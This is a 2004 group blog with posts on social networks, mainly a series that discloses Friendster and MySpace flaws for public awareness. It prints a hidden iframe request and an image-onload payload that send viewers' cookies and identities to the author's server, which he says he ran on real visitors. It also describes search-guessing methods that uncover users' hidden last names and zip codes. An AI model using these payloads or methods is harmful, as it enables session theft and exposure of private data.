10.02.04

Hacking Social Networks part II (Don't search private data)

This installment of Hacking Social Networks is about search and private data. The point we want to make is that public searches should never be allowed to return results based on private data. To be clear, we do not mean results that explicitly include private data, but results that, while only containing public data, are constraind by private data. Let's take three pieces of private data on Friendster: last name, zip, and email adress, and consider how they can be abused or discovered.

Last names in many social networks, including Friendster, are considered private data. To find the last name of someone on friendster we will use the user search feature. User search lets you search for people by first and last name. The user's profile reveals to you their first name and their user id (in the url). To abuse the user search, enter the user's first name, guess a last name and see if any of the returned users match the user we are interested in. This approach is reasonable because the distribution of last names is not even; it is in fact so uneven that one out of every one hundred people in the US have the last name Smith. The US Census Bureau provides us with the data. From this we see that after trying only twenty-eight last names we have a ten percent chance of having guessed the user's last name. As we go down the list the probability for each new name decreases so we have to try more and more names to increase our chance of getting a match. The 115th name gets us to twenty percent, 315th, thirty percent, 771th, forty percent, and so on. Clearly, this is too much to do by hand but not too much for a program to perform. Most last names can be discovered from Friendster profiles.

The second private data we consider is zip codes. Like last names, zip codes are not made available in profiles but are used as part of the Gallery search criteria. To perform this attack, first retreive the user id and location from a user's profile. Then, get all the zip codes for their location. For each zip code, change your location to that zip code, and perform a Gallery search for the user with the distance set to one mile*. Note which searches returned the user in question. Once all searches have been performed, you can deduce which zipcode the user acculy resides in using either a zip code map, which can be found in your phone book, or by looking at the distances between the zip codes.

*To search the Gallery with a distance of one mile you must save the page and edit the distance menu html to include 1 as a option.

Email addresses are the third data we discuss. There is no easy mapping from
user id to email address. Instead we do the opposite: find someone's Friendster account by email address. We have written about this once before, providing an example bookmarklet for finding people on Friendster. Besides the bookmarklet, we also have a program which generates reports of Friendster profiles by monitoring local network traffic. The privacy issue is: your email address, which most people use as if it is pseuodonymous, is no longer pseudonymous. Instead it is tightly coupled with your identity on any social network services you use.

Someone can post a personal ad on craigslist and check the picture and details of all the respondents before writing back. Suddenly, a total stranger knows what you look like, who your friends are, your gender and sexual orientation, what movies you like and how you spend your free time. This increase in transparency isn't evident when you sign up to these services.

Posted by moore at 13:11 | Comments (6)

05.02.04

Hacking Friendster, Part I

EDITOR'S NOTE: I have posted these hacks in the hopes of publicizing security holes and forcing the networks to close them. Please do not send me email, myspace messages, or friendster messages asking me to spend my free time helping you duplicate this hack. Both Myspace and Friendster have modified their sites enough so that these hacks no longer work. In addition, this article contained far more than enough information to duplicate these hacks (when they worked), and still contains enough information to build similar hacks today. If you do not understand how to make similar hacks, consider doing your own research. If you want my help learning CGI and DHTML/JavaScript, I am available as an independent contractor and instructor at the rate of $60/hr. If you contact me asking for assistance in stealing other people's personal information I will forward your email to the relevant social network's abuse contact person, and recommend that they deactivate your account.

This is the first in a series of articles that expose security flaws in social networks. The two hacks described here are cross-site scripting attacks.

My Friendster profile has a link to my homepage. And my homepage has an embedded iframe in it, which uses a get string to call the "Forward this profile to another user" function of friendster.

In other words, by loading my webpage, your browser loads a page which sends an email to me, via the Friendster service. This email contains: your first & last name, the email you used to sign up to Friendster, your Friendster user-id, and a link which I can use to sign up to Friendster and automatically become your friend. There is no record of this anywhere on your Friendster account; it is totally invisible.

Here's the code in my homepage:

<iframe src="http://www.friendster.com/forward?id=229243&email=MYEMAIL&subject=friendsterview&message=friendsterview" width="1" height="1">

Here's a sample of what gets sent in email:

Matt Chisholm has forwarded a user's profile to you from Matt's
personal network on Friendster.

Matt is 27 in San Francisco, CA.

If you are a Friendster member, you can view Matt's profile by
clicking below:
http://www.friendster.com/user.jsp?id=229243

If you are not a Friendster member yet, you can join Friendster by
clicking below:
http://www.friendster.com/join.jsp?inviteuser=229243

Friendster is an online community that connects people through networks
of friends for dating or making new friends.

Once you join Friendster, you will be automatically connected to your
friend Matt, and all of Matt's friends.

Friendster is inadvertently impervious to this attack, however, since you are often logged out within moments of logging in, and when you do successfully stay logged in, the site is either too slow or by that point my profile is no longer in your "Personal Network."

The security holes on Myspace, while they have gotten better, are much deeper. For a long time, they allowed free HTML entry in all fields, and they still allow some HTML entry.

For a long time, you could embed an image in your Myspace profile which called another Myspace function, so you effectively could cause a user viewing your profile (or anything with text that you created) to execute any Myspace function with your own parameters.

In these heady days of Myspace hackability, Jonathan & I created some interesting myspace hacks, which he will describe in a later post.

At some point, someone at Myspace wised up, and stopped allowing http GET requests, and then they blacklisted the <iframe> and <script> tags, added javascript to their pages to prevent them being loaded in frames, and at at least one point, someone removed a hack from my profile. (Plus for some reason they don't allow # characters in text.)

Myspace hasn't completely closed off their security holes, however. The numerous javascript event handlers are still allowed, and so are image tags, so you can embed a 1x1 image, and execute arbitrary javascript on image load.

My javascript of choice attempts to log who is viewing my profile, by sending the content of the launchIC function, which contains the viewer's UID, and all of their browser cookies, to php on my site which mails it to me.

<img src="images/new_logo_test11.gif" width="10" id="h44" height="10" onload="document.getElementById('h44').src= 'http://www.theory.org/~matt/myspace.php?u='+ escape(document.cookie)+launchIC;">

The email I get looks like this (you can see my userid down there being assigned to memberID, and the cookie content varies greatly depending on what the user has been doing):

myspace view from
IMREQUESTCHECK={ts '2004-02-05 00:43:03'}
MYUSERINFO=M)NOMP_;R2P6%P]>35)6OF/N$5%:C4MIYK,N7@Y'!2\N
6R ??S\/&1/[**0K:R_DIS10DSZOKX@ !
function launchIC(destinationMemberID) {    memberID = \"104189\"
   PrivoxyWindowOpen(\"index.cfm?fuseaction=messanger

As before, there is no record anywhere that the user can see.

And now for the question on everyone's mind. What is the upshot of all of this hacking? Who's viewing my profiles and checking out my webpage? The answers are actually quite depressing. The Friendster hack catches my friends more often than anyone else. And the people who view my Myspace profile fall into two categories: gay guys in San Francisco, and eighteen year-olds in the suburbs. I've even mailed girls on Myspace who have responded apparently without looking at my profile at all.

I leave the ramifications of this kind of insecurity in the hands of a malicious user as an exercise to the reader.

Update 10-02-2004: I should think it's obvious from this article that if you load up either url and are logged in to myspace or friendster, I will get an email with your userid.This is how I know that the ubiquitous myspace admin, Tom (userid #6221) just viewed my profile at about 8:50 pm PST tonight. I can only assume (since absolutely no one has viewed my profile there for months prior to posting this article) that this viewing event was in response to reading this article. Yay for him! I could tell you what zip code he lives in and what parameters he's been using to browse the myspace network, but I'm a nice guy and I won't. Hopefully myspace will close up their free-html security holes and not delete my account for what I'm sure is a TOS violation under some interpretations.

Update 15-02-2004: Some people have asserted that posting this kind of information on my blog is "not cool." These vulnerabilities in free HTML entry are well known, well documented vulnerabilities. I haven't discovered a new thing here; any nimrod with a DHTML manual can do this. If you run a website where people can enter free HTML, you should protect yourself and your users from these vulnerabilities. With a little bit of effort, a social engineering virus like MYDOOM could be spreading on Myspace, bringing the myspace servers to their knees and frustrating users into quitting the service.

If you are interested, I am part of a consulting company which will do security consulting for sites like these.

Update II: 15-02-2004: Some enterprising Myspace denizens have been copying and pasting my Myspace hack into their profiles. If you do this, the hack will just mail all of the information it collects to me; you will gain nothing, and it clutters up my inbox. If you want to duplicate this hack you'll have to set up a mailing script on your own site.

Update III: 26-02-2004: Jonathan has posted Hacking Social Networks Part II: Don't search private data Check back for the third installment soon.

Posted by matt at 01:20 | Comments (3)

02.10.03

The 'Net Builds Itself

With the proliferation of community web spaces such as wikis, blogs, forums, and commenting systems comes worries of vandalism. A recent article by Dan Gillmor, Remembering the People Who Give Back to the Net, and All of Us, discusses the vandlism of his WordPirates site. The vandals showed Dan the "downside of the Net" while the mass of people who helped restore the site to its intended state showed Dan the "profound upside".

One of the most interesting things about open sites is that they are forced to become what the net wants them to be. Who's good and who's bad (vandals vs maintainers) is really a popularity contest. Wikipedia persists because there are a lot of people who like to work and build Wikipedia. The BitTorrentFAQ wiki node often appears vandalized because there isn't a strong community behind the wiki (and possibly because people don't know how to easily fix it). Friendster thrives with fakesters because there is a strong community of fakesters (even a manifesto) and people who want to connect to fakesters.

The net builds what it wants. If there is a stronger force that doesn't want a site the way it is and the force works to take the site down, it will go down. Is this wrong? I don't think so. I think anyone should be able to have an open site but they will have to build community if they want it to be successful and protected. Foreign policy sans WOMD?

Posted by brainsik at 05:17 | Comments (2)

23.09.03

The Britney Twisty Puzzle Contention

There are two problems in contention for resource discovery in social networks. One is that there are cases where you want to create partitions in the network to allow for diversity of ideas . The second is that you want to make it easy to find esoteric subjects. The first I will describe in terms of Britney Spears fans and fetishists: the fans and fetishists problem. The second I will describe in terms of twisty puzzles: the esoteric resource discovery problem.

The Fans and Fetishists problem is the desire to create partitions of the social network so that diversity can exist. Take for example two groups of Britney Spears devotees: fans and fetishists. The fans are mostly young people who actually enjoy the singer's music. These fans want a place to discuss Britney and engage in other such wholesum, fan related actvity. The fetishists on the other hand are mostly adults who have impure thoughts about the pop-icon. They are instead in discussion and activities not appropriate for the majority of the fans. The goal is to allow both to exist, guard against the fans from accidently stumbling in to a fetishist discussion group, and (probably) increase the difficulty for the fetishists to find a fans group.

In meat space, the separation between fetishist and fans is largely accomplished by performing resource discovery in the social network. The fans are unlikely to accidently end up hanging out with a bunch of fetishists because they are not connected to the adult network that the fetishists exist in. Similarly, adolescent fan social networks are inaccessible to the fetishists; they would find it difficult to know when and where the fans meet to trade gossip.

The twisty puzzle probliem is much simpler to describe. Simply, avid twisty puzzle fans are a disperse and disconnected group which would like to have a common discussion forum. A single forum is desired beacuse there are only a small number of true twisty junkies and they are physically and socially distant. This type of situation is not solved well in meat space but is handled fine on the internet. A short session with google will find you the twisty fan sites and mailing lists.

The contention between these two problems is the of ease of resource discovery. It should be easy for twisty and hard for Britney. For the Britney problem, we can borrow from meat space and allow a Britney group to be discovered only by reference from someone in your online social network. For the twisty problem, one common solution is to have a searchable directory interest groups. One could provide an option in group creation as to whether or not it should be listed in the directory. My issue with is I don't trust users to make the right choice when deciding to have their group listed or not. For me, the challenge is to find an approach that is "natural", requiring the user to make no choices about how resource discovery works.

A note about central directories.

There is a general problem with central directories. Over time, popular topics tend to have a poor signal-to-noise ratio. This can be seen in what happened to usenet news as the internet expanded. It seems largely, the answer people took to this change was to create mailing lists and move off usenet. Since there was no central directory of mailing lists, they are harder to find and there are often multiple ones per topic. I think both these factors help to increase the S/N ratio for mailing lists over usenet, but of course, again, at the cost of making it harder for esoteric groups to form.

Posted by moore at 09:31

Creepster

I have been thinking about different creepy ways to use friendster latley. This is my first hack: It is a bookmarklet that will search friendster for the currently selected text as an email adress. Basically, what that means is you select an email address on a web page, click, and see whether there is a friendster profile using that address.

Friendster email lookup (bookmarklet)

I have only tried it under mozilla, but it should work in ie as well, and it does not work when there are frames. As I probably will not use this much myself, it is unlikey that I will fix the frame issue. If you want to use it, drag the link to your short cut bar.

Posted by moore at 09:22